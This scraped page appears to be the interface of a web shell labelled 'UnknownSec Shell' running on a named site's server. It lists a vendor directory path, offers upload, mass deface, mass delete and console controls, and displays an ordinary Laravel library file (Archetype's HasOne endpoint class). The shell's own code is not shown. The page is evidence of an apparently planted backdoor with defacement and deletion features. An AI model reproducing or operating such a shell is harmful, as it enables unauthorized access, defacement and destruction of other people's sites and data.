shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
ajthinking
/
archetype
/
src
/
Endpoints
/
Laravel
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
HasOne.php
<?php namespace Archetype\Endpoints\Laravel; use Archetype\Endpoints\EndpointProvider; use Archetype\Support\LaravelStrings; use Archetype\Support\Snippet; class HasOne extends EndpointProvider { /** * @example Add a hasOne relationship method * @source $file->hasOne('Company') */ public function hasOne($targets) { return $this->add($targets); } protected function add($targets) { return $this->file->astQuery() ->class() ->insertStmts( collect($targets)->map(function ($target) { return Snippet::___HAS_ONE_METHOD___([ '___HAS_ONE_METHOD___' => LaravelStrings::hasOneMethodName($target), '___TARGET_CLASS___' => class_basename($target), '___TARGET_IN_DOC_BLOCK___' => LaravelStrings::hasOneDocBlockName($target) ]); })->toArray() )->commit() ->end() ->continue(); } }
© 2026 UnknownSec